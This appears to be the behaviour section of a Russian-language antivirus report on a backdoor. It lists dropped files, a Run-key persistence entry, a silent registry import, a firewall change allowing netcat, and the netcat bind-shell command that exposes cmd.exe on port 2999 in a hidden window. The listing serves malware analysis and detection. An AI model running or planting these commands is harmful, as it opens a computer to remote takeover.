Техническая информация
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'Backdoor' = '"<SYSTEM32>\backdoor.exe"'
- %TEMP%\ixp000.tmp\backdoor.exe
- %TEMP%\ixp000.tmp\backdoor.reg
- %TEMP%\ixp000.tmp\nc.exe
- %TEMP%\ixp000.tmp\start.bat
- %WINDIR%\syswow64\nc.exe
- %WINDIR%\syswow64\backdoor.exe
- %TEMP%\ixp000.tmp\start.bat
- %TEMP%\ixp000.tmp\nc.exe
- %TEMP%\ixp000.tmp\backdoor.reg
- %TEMP%\ixp000.tmp\backdoor.exe
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- '%TEMP%\ixp000.tmp\backdoor.exe'
- '%TEMP%\ixp000.tmp\nc.exe' -L -d -t -p 2999 -e cmd.exe
- '%TEMP%\ixp000.tmp\backdoor.exe' ' (со скрытым окном)
- '%TEMP%\ixp000.tmp\nc.exe' -L -d -t -p 2999 -e cmd.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c start.bat cmd.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c start.bat cmd.exe
- '%WINDIR%\syswow64\regedit.exe' /S backdoor.reg
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%TEMP%\ixp000.tmp\nc.exe"